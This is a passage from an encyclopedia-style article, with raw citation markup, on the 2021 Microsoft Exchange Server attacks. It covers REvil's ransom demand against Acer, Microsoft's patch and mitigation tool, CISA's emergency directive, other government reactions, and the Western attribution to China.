On 18 March 2021, an affiliate of the REvil ransomware gang claimed to have stolen unencrypted data from Taiwanese hardware and electronics corporation Acer and to have encrypted an undisclosed number of its devices; cybersecurity firm Advanced Intel linked this data breach and ransomware attack to the Microsoft Exchange exploits, having detected one of Acer's Exchange servers first being targeted on 5 March 2021. REvil demanded a ransom of US$50 million, claiming that if it was paid they would "provide a decryptor, a vulnerability report, and the deletion of stolen files", and stating that the ransom would double to US$100 million if it was not paid by 28 March 2021.{{Cite web|date=19 March 2021|title=Computer giant Acer hit by $50 million ransomware attack|url=https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/|url-status=live|access-date=2021-03-20|website=BleepingComputer|language=en-us|archive-url=https://web.archive.org/web/20210319193457/https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/ |archive-date=19 March 2021 }}
Responses
On 2 March 2021, the Microsoft Security Response Center (MSRC) published an out-of-band security update covering several Common Vulnerabilities and Exposures (CVE) entries, including CVE-2021-26855, and urged customers to patch their Exchange servers immediately.{{Cite web|date=2 March 2021|title=Multiple Security Updates Released for Exchange Server|url=https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855|access-date=10 March 2021|website=Microsoft Security Response Center}} On 15 March, Microsoft released a one-click PowerShell tool, the Exchange On-Premises Mitigation Tool (EOMT), which applies a mitigation for CVE-2021-26855 on the server, runs the Microsoft Safety Scanner to detect web shells and other malware, and removes the threats it finds; Microsoft recommended it only as an interim measure, because it does not install the security updates themselves.{{Cite web|date=16 March 2021|title=Microsoft tool provides automated Exchange threat mitigation|url=https://www.itnews.com.au/news/microsoft-tool-provides-automated-exchange-threat-mitigation-562211|url-status=live|access-date=16 March 2021|website=iTnews|archive-url=https://web.archive.org/web/20210316073516/https://www.itnews.com.au/news/microsoft-tool-provides-automated-exchange-threat-mitigation-562211 |archive-date=16 March 2021 }}
On 3 March 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive requiring federal civilian agencies to patch their Exchange servers or disconnect them. On 8 March, CISA tweeted what NBC News described as an "unusually candid message" urging "ALL organizations across ALL sectors" to address the vulnerabilities.{{Cite tweet|user=USCERT_gov|number=1369097815901827081|title=CISA announcement}}{{Cite web|title=Remediating Microsoft Exchange Vulnerabilities|url=https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities|access-date=10 March 2021|website=Cybersecurity and Infrastructure Security Agency|archive-date=9 March 2021|archive-url=https://web.archive.org/web/20210309235213/https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities|url-status=dead}}
Other official bodies expressing concern included the White House, Norway's National Security Authority and the Czech Republic's Office for Cyber and Information Security.{{Cite news|last=Murphy|first=Hannah|date=5 March 2021|title=White House warns of 'large number' of victims in Microsoft hack|work=Financial Times|url=https://www.ft.com/content/c9601a1a-ab3b-4059-8ca3-67b8387b6170}}{{Cite web|last=Vavra|first=Shannon|date=5 March 2021|title=Victims of Microsoft Exchange Server zero-days emerge|url=https://www.cyberscoop.com/microsoft-exchange-server-czech-republic-norway-hafnium-chinese-hackers/|url-status=live|access-date=10 March 2021|website=CyberScoop|language=en|archive-url=https://web.archive.org/web/20210305151609/https://www.cyberscoop.com/microsoft-exchange-server-czech-republic-norway-hafnium-chinese-hackers/ |archive-date=5 March 2021 }} On 7 March 2021, CNN reported that the Biden administration was expected to form a task force to address the breach;{{Cite web|last=Marquardt|first=Alex|date=6 March 2021|title=Biden administration expected to form task force to deal with Microsoft hack linked to China|url=https://www.cnn.com/2021/03/06/politics/microsoft-hack-task-force/index.html|url-status=live|access-date=10 March 2021|website=CNN|archive-url=https://web.archive.org/web/20210307001911/https://www.cnn.com/2021/03/06/politics/microsoft-hack-task-force/index.html |archive-date=7 March 2021 }} the administration invited private-sector organizations to participate in the task force and said it would provide them with classified information as deemed necessary. U.S. National Security Advisor Jake Sullivan stated that the U.S. was not yet in a position to attribute blame for the attacks.
In July 2021, the Biden administration, along with a coalition of Western allies, formally blamed China for the cyberattack. The administration highlighted the ongoing threat from Chinese state-backed hackers but did not accompany the condemnation with any form of sanctions. According to White House press secretary Jen Psaki, the administration was not ruling out future consequences for China.{{Cite web |last=Tucker |first=Eric|date=19 July 2021| title = Microsoft Exchange hack caused by China, US and allies say|url=https://apnews.com/article/microsoft-exchange-hack-biden-china-d533f5361cbc3374fdea58d3fb059f35|url-status=live|access-date=3 September 2021|website = AP News|archive-url=https://web.archive.org/web/20210719111027/https://apnews.com/article/microsoft-exchange-hack-biden-china-d533f5361cbc3374fdea58d3fb059f35 |archive-date=19 July 2021 }}